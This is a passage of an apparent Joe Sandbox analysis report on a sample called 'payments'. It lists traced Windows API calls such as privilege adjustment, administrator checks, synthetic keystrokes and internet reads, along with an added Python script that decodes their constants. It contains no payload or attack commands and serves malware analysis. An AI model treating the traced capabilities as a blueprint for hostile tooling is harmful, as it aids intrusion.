                                                                                                                          • Instruction ID: e0a4f4887ec29d428571055bb81d528cfc4a705b0f9d2d31f45b9db5511bcfa7
                                                                                                                          • Opcode Fuzzy Hash: f0eab7dbdfc5cdd79ae8565d369e3a2b421dcf92bc43f062251652b7b9644166
                                                                                                                          • Instruction Fuzzy Hash: FCA126B411410BBADB286A2A5C88FBF6A6CEF47349B144A1EF906D21D3DB15DD01A272
                                                                                                                          APIs
                                                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00CE43BF,00000000), ref: 00CE4FA6
                                                                                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00CE4FD2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 599397726-0
                                                                                                                          • Opcode ID: 411132a23c200be83978e6212c28145119db2a764fc53a219e6df354d1921c7e
                                                                                                                          • Instruction ID: 361dd779f931697746a5bbc83bde52060a43ca97839be4d100d9cbfa478aef37
                                                                                                                          • Opcode Fuzzy Hash: 411132a23c200be83978e6212c28145119db2a764fc53a219e6df354d1921c7e
                                                                                                                          • Instruction Fuzzy Hash: B541D571904749BFEB24DEC6CC85EBBB7BDEB40758F10406AF205A6181DA719E41A6A0
                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00CDE20D
                                                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00CDE267
                                                                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00CDE2B4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1682464887-0
                                                                                                                          • Opcode ID: 974079e3b512952a5572c22c1c0ef4b524ffae3cf7746c0d76e5a7357ef25b49
                                                                                                                          • Instruction ID: 893b08e196b3fc8d1afc151417c67ad91e80d9e8e248cb672aa6af36b9cc65c6
                                                                                                                          • Opcode Fuzzy Hash: 974079e3b512952a5572c22c1c0ef4b524ffae3cf7746c0d76e5a7357ef25b49
                                                                                                                          • Instruction Fuzzy Hash: BA216D35A00218EFCB00EFA5D885AEDBBB9FF49314F0584AAE905EB351DB319905CB60
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAF4EA: std::exception::exception.LIBCMT ref: 00CAF51E
                                                                                                                            • Part of subcall function 00CAF4EA: __CxxThrowException@8.LIBCMT ref: 00CAF533
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CCB180
                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CCB1AD
                                                                                                                          • GetLastError.KERNEL32 ref: 00CCB1BA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1922334811-0
                                                                                                                          • Opcode ID: 1fe0ab1cc4f117e39d23155d3c819859bee1ecd76420214924dbd47d2927cd10
                                                                                                                          • Instruction ID: ff71044630caebb5eeddf16ca3000c2e5ebf509bebb319d4dab0dfb92b0a6847
                                                                                                                          • Opcode Fuzzy Hash: 1fe0ab1cc4f117e39d23155d3c819859bee1ecd76420214924dbd47d2927cd10
                                                                                                                          • Instruction Fuzzy Hash: 2A11BFB2500305BFE7189F94DC86D6BB7BDEB44310B20852EE05693240DB70FC428A60
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00CD66AF
                                                                                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00CD66EC
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00CD66F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 33631002-0
                                                                                                                          • Opcode ID: b53ee0c75b9dac813dea577ab1ea3f4c58c88fbe06c0e3d0835079d4c7103845
                                                                                                                          • Instruction ID: 116e9b57dd776989b64cc17f4b4ef5ba0acfbf648d382d3554802de7b2a8201d
                                                                                                                          • Opcode Fuzzy Hash: b53ee0c75b9dac813dea577ab1ea3f4c58c88fbe06c0e3d0835079d4c7103845
                                                                                                                          • Instruction Fuzzy Hash: 8E118EB2900328BEE7108BA8DC45FAFBBBCEB08714F004556FA11E7290C3B49A0587A5
                                                                                                                          APIs
                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00CD7223
                                                                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00CD723A
                                                                                                                          • FreeSid.ADVAPI32(?), ref: 00CD724A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3429775523-0
                                                                                                                          • Opcode ID: 41755e52ba5f7b543de2fe6971c54ffa89c99a725f4aea88be3f6d253ea81893
                                                                                                                          • Instruction ID: 9ac11c0553bc060f6692cfc725eef49d0f62b13c11e2eadd992c10faf3e35c2e
                                                                                                                          • Opcode Fuzzy Hash: 41755e52ba5f7b543de2fe6971c54ffa89c99a725f4aea88be3f6d253ea81893
                                                                                                                          • Instruction Fuzzy Hash: CDF01275904309FFDF04DFE4DD8AAEDBBB9EF08301F108469A602E2291E77457458B10
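The hexadecimal arguments in the APIs lines above are where the analyst-relevant facts sit: the 002D1400 passed to DeviceIoControl is IOCTL_STORAGE_QUERY_PROPERTY (a storage-descriptor query on a handle opened with OPEN_EXISTING and FILE_READ_ATTRIBUTES only), the 00000002/00000020/00000220 passed to AllocateAndInitializeSid build S-1-5-32-544 (BUILTIN\Administrators) for the CheckTokenMembership "is the caller an administrator" test, and SetErrorMode(1) is SEM_FAILCRITICALERRORS, which suppresses the "no disk in drive" dialog while GetDiskFreeSpaceExW probes drives. These are the helper routines of a generic runtime rather than payload logic, consistent with the AutoIt indicator in the signatures at the top of the report. The GetLastError immediately after AdjustTokenPrivileges is also a real check: that call returns success even when the privilege could not be enabled and reports ERROR_NOT_ALL_ASSIGNED through GetLastError, so the caller cannot know whether it obtained the privilege without it. The Python below is an added example and not Joe Sandbox or sample code; it parses the trace-line format used on this page and expands those constants. The SID identifier authority is passed by pointer and is not visible in the trace, so SECURITY_NT_AUTHORITY is assumed; the trace lines embedded in the block are copied from the entries above.

```python
"""Decode the raw argument values shown in the 'APIs' trace lines above.

Added example, not code from Joe Sandbox or from the sample: it parses the
trace-line format used on this page and expands the constants an analyst
needs (CTL_CODE fields of an IOCTL, SID sub-authorities, flag words).
"""
import re
from typing import Optional

# Matches lines such as
#   • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C), ref: 00CD66EC
# Lines without an argument list ("GetLastError.KERNEL32 ref: ...") do not match.
TRACE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w@:]+)\.(?P<module>[A-Za-z0-9]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# CTL_CODE layout: DeviceType << 16 | Access << 14 | Function << 2 | Method
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
DEVICE_TYPES = {0x07: "FILE_DEVICE_DISK", 0x09: "FILE_DEVICE_FILE_SYSTEM", 0x2D: "FILE_DEVICE_MASS_STORAGE"}
KNOWN_IOCTLS = {
    0x2D1400: "IOCTL_STORAGE_QUERY_PROPERTY",   # the code passed at ref 00CD66EC
    0x2D1080: "IOCTL_STORAGE_GET_DEVICE_NUMBER",
    0x70000: "IOCTL_DISK_GET_DRIVE_GEOMETRY",
    0x90064: "FSCTL_GET_NTFS_VOLUME_DATA",
}
WELL_KNOWN_SIDS = {"S-1-5-32-544": "BUILTIN\\Administrators", "S-1-5-32-545": "BUILTIN\\Users",
                   "S-1-5-18": "NT AUTHORITY\\SYSTEM"}
SEM_FLAGS = {0x1: "SEM_FAILCRITICALERRORS", 0x2: "SEM_NOGPFAULTERRORBOX",
             0x4: "SEM_NOALIGNMENTFAULTEXCEPT", 0x8000: "SEM_NOOPENFILEERRORBOX"}
ACCESS_MASK = {0x80: "FILE_READ_ATTRIBUTES", 0x40000000: "GENERIC_WRITE", 0x80000000: "GENERIC_READ"}
FILE_SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATE_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def parse_trace_line(line: str) -> Optional[dict]:
    """Return {'api', 'module', 'args', 'ref'}; '?' (unresolved) arguments become None."""
    m = TRACE_RE.match(line)
    if not m:
        return None
    raw = [a.strip() for a in m.group("args").split(",")] if m.group("args").strip() else []
    return {"api": m.group("api"), "module": m.group("module"),
            "args": [None if a == "?" else int(a, 16) for a in raw],
            "ref": int(m.group("ref"), 16)}


def decode_ioctl(code: int) -> dict:
    """Split a CTL_CODE into its device type, function number, method and access fields."""
    dev, acc, fn, meth = code >> 16, (code >> 14) & 3, (code >> 2) & 0xFFF, code & 3
    return {"name": KNOWN_IOCTLS.get(code, "unknown"), "device": DEVICE_TYPES.get(dev, hex(dev)),
            "function": fn, "method": METHODS[meth], "access": ACCESS[acc]}


def sid_string(authority: int, sub_authorities) -> str:
    """Build the textual SID (revision 1) from an identifier authority and its RIDs."""
    return "S-1-%d%s" % (authority, "".join("-%d" % s for s in sub_authorities))


def decode_flags(value: int, table: dict) -> list:
    """Name every bit of `value` listed in `table`; leftover bits are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    return names + ([hex(rest)] if rest else [])


def decode_call(call: dict) -> dict:
    """Expand the arguments that matter for the API calls listed on this page."""
    api, a = call["api"], call["args"]
    if api == "DeviceIoControl" and a[1] is not None:
        return decode_ioctl(a[1])
    if api == "AllocateAndInitializeSid" and a[1] is not None:
        # The identifier authority is passed by pointer and is not visible in the
        # trace; SECURITY_NT_AUTHORITY (5) is assumed, which RIDs 32/544 imply.
        sid = sid_string(5, a[2:2 + a[1]])
        return {"sid": sid, "account": WELL_KNOWN_SIDS.get(sid, "unknown")}
    if api == "SetErrorMode":
        return {"flags": decode_flags(a[0], SEM_FLAGS)}
    if api == "CreateFileW":
        return {"access": decode_flags(a[1], ACCESS_MASK), "share": decode_flags(a[2], FILE_SHARE),
                "disposition": CREATE_DISPOSITION.get(a[4], a[4])}
    return {}


# Trace lines copied from the entries above (CreateFileW/DeviceIoControl,
# SetErrorMode and AllocateAndInitializeSid); the last one has no argument list.
TRACE_LINES = [
    "• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00CD66AF",
    "• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00CD66EC",
    "• SetErrorMode.KERNEL32(00000001), ref: 00CDE20D",
    "• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00CD7223",
    "• GetLastError.KERNEL32 ref: 00CCB1BA",
]


def decode_trace(lines) -> list:
    """Return [(api_name, decoded_arguments)] for every parseable line."""
    out = []
    for line in lines:
        call = parse_trace_line(line)
        if call is not None:
            out.append((call["api"], decode_call(call)))
    return out


if __name__ == "__main__":
    for api, info in decode_trace(TRACE_LINES):
        print(api, info)
```

Running the block prints one decoded record per parseable line; entries without an argument list, such as the bare GetLastError line, are skipped rather than guessed at. Pointer arguments stay as None, which is why the SID authority has to be an assumption rather than a decoded value.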
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00CDF599
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CDF5C9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2295610775-0
                                                                                                                          • Opcode ID: ccddce19dd34a311239e8659c197cfda57001f157a14501b840dc243ea6fbdfd
                                                                                                                          • Instruction ID: 3b2f023739211730e2529d572a3941b4d6e02593628496a88522f9dd2e950095
                                                                                                                          • Opcode Fuzzy Hash: ccddce19dd34a311239e8659c197cfda57001f157a14501b840dc243ea6fbdfd
                                                                                                                          • Instruction Fuzzy Hash: 8B11A131604201AFDB00EF28D845A6EB3E9FF85324F00891EF9A6D7391DB30A9058B91
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00CEBE6A,?,?,00000000,?), ref: 00CDCEA7
                                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00CEBE6A,?,?,00000000,?), ref: 00CDCEB9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3479602957-0
                                                                                                                          • Opcode ID: 59da8e413c5f92e38a357627392fc419a52c915f90d5cc5631166a663485192d
                                                                                                                          • Instruction ID: 6eb650dea71df2d68dacf3538fe9e24fdd6c9c2f516c1533ec52dd548b4e6fcb
                                                                                                                          • Opcode Fuzzy Hash: 59da8e413c5f92e38a357627392fc419a52c915f90d5cc5631166a663485192d
                                                                                                                          • Instruction Fuzzy Hash: 79F08275100329BBDB109BA4DC89FFA776EBF09351F008166F915D6281D7309A41CBA0
                                                                                                                          APIs
                                                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00CD4153
                                                                                                                          • keybd_event.USER32(?,753DC0D0,?,00000000), ref: 00CD4166
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InputSendkeybd_event
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3536248340-0
                                                                                                                          • Opcode ID: db2d477f32fef1c327b6092a926625dc4a4e0e206726fa904e3e6bbf3f1d213c
                                                                                                                          • Instruction ID: 99ee69950dc0ea7e7810674701b1b6e9aa7ac100c53ebaee3fabc880bb9a1ea5
                                                                                                                          • Opcode Fuzzy Hash: db2d477f32fef1c327b6092a926625dc4a4e0e206726fa904e3e6bbf3f1d213c
                                                                                                                          • Instruction Fuzzy Hash: D2F06D7080038DAFEB059FA0C805BFE7FB1EF00305F00800AFA6596291D77986129FA0
                                                                                                                          APIs
                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CCACC0), ref: 00CCAB99
                                                                                                                          • CloseHandle.KERNEL32(?,?,00CCACC0), ref: 00CCABAB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 81990902-0
                                                                                                                          • Opcode ID: 73b61ac6a419981f8c3f47bea669e29029f10a941f5a0b422ea2316e070963d2
                                                                                                                          • Instruction ID: 563c2ecba66256058d1ac3f311bf740748bfde88a1e667ad2c3417553e5dd67d
                                                                                                                          • Opcode Fuzzy Hash: 73b61ac6a419981f8c3f47bea669e29029f10a941f5a0b422ea2316e070963d2
                                                                                                                          • Instruction Fuzzy Hash: B6E0BF71000611BFE7262F95EC09DB6B7AAEB04324710842DF45981470DB725D929B50
                                                                                                                          APIs
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00CB6DB3,-0000031A,?,?,00000001), ref: 00CB81B1
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00CB81BA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3192549508-0
                                                                                                                          • Opcode ID: 1a6d546b24aa17457075f10b0ff0cf13069c453cc51ee015a5729d25bb06f303
                                                                                                                          • Instruction ID: c923e135bc2bb274d27f0a813e2f59a3c127696350f4a3213cee6c4e7c3a7337
                                                                                                                          • Opcode Fuzzy Hash: 1a6d546b24aa17457075f10b0ff0cf13069c453cc51ee015a5729d25bb06f303
                                                                                                                          • Instruction Fuzzy Hash: 09B09231144708BBDB002BE1EC09B98BF6AEB08652F108010F62D84261CF7254128AA2
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _memmove
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4104443479-0
                                                                                                                          • Opcode ID: 16fd2233a62fcadf142b525fb6a2f5e5df710038bdc9f2fbb49a54b665d91dd3
                                                                                                                          • Instruction ID: e630103c3929dabcc522c1893b099f31990a5d44875c8a87ba3eed8d4f6b05ca
                                                                                                                          • Opcode Fuzzy Hash: 16fd2233a62fcadf142b525fb6a2f5e5df710038bdc9f2fbb49a54b665d91dd3
                                                                                                                          • Instruction Fuzzy Hash: 09A25A75A05219DFCF24CF58C4847ADBBB1FF48310F2582A9E859AB390DB319E81DB90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: dee0738ba789d3545b961eb382d2e1923c6018a967d63b32adeb58aff460ee37
                                                                                                                          • Instruction ID: 86a973145b9cc17e635f41d8206f2b3bf5a9e658aec117d343e68ec1caf6e83b
                                                                                                                          • Opcode Fuzzy Hash: dee0738ba789d3545b961eb382d2e1923c6018a967d63b32adeb58aff460ee37
                                                                                                                          • Instruction Fuzzy Hash: 24323531D29F014DD7239634D822376A288AFB73D5F15D737F82AB5AAAEF29C5834110
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __itow__swprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 674341424-0
                                                                                                                          • Opcode ID: eda14d3f5d36228393ee37b810efac0a513d8885a848edab52706373a9ba8e75
                                                                                                                          • Instruction ID: 5dafb649a698112c100fecb0da728372e1872be19f85a72f48f775b6a15d7f5e
                                                                                                                          • Opcode Fuzzy Hash: eda14d3f5d36228393ee37b810efac0a513d8885a848edab52706373a9ba8e75
